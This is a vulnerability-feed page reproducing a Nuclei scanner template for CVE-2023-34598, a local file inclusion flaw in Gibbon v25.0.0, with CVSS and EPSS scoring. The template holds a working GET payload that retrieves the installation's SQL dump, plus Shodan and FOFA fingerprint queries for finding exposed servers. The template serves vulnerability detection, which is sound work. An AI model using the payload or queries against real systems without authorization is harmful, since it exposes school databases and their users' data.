Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-34598
HistoryJun 26, 2023 - 4:38 a.m.

Gibbon v25.0.0 - Local File Inclusion

2023-06-2604:38:27
ProjectDiscovery
github.com
2
cve2023
gibbon
local file inclusion
gibbonedu

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.035 Low

EPSS

Percentile

91.6%

Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.
id: CVE-2023-34598

info:
  name: Gibbon v25.0.0 - Local File Inclusion
  author: DhiyaneshDk
  severity: critical
  description: |
    Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response.
  impact: |
    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
  remediation: |
    Upgrade to a patched version of Gibbon or apply the necessary security patches to mitigate the LFI vulnerability.
  reference:
    - https://github.com/maddsec/CVE-2023-34598
    - https://twitter.com/shaybt12/status/1673612503547355137?s=20
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34598
    - https://github.com/izj007/wechat
    - https://github.com/komodoooo/Some-things
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34598
    cwe-id: CWE-22
    epss-score: 0.02842
    epss-percentile: 0.90694
    cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: gibbonedu
    product: gibbon
    shodan-query:
      - http.favicon.hash:-165631681
      - http.favicon.hash:"-165631681"
    fofa-query: icon_hash="-165631681"
  tags: cve2023,cve,gibbon,lfi,gibbonedu

http:
  - method: GET
    path:
      - "{{BaseURL}}/?q=./gibbon.sql"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "phpMyAdmin SQL Dump"
          - "gibbon"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100e109ccf0a50716484e972ba9e89838a49010d879762fc41193f517518acdc4dd0220531108ca8ef31c09920ca876751c47ab0893e4ea3088c3c5bbfd1cf18c1a7e62:922c64590222798bb761d5b6d8e72950

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.4 High

AI Score

Confidence

High

0.035 Low

EPSS

Percentile

91.6%

Related for NUCLEI:CVE-2023-34598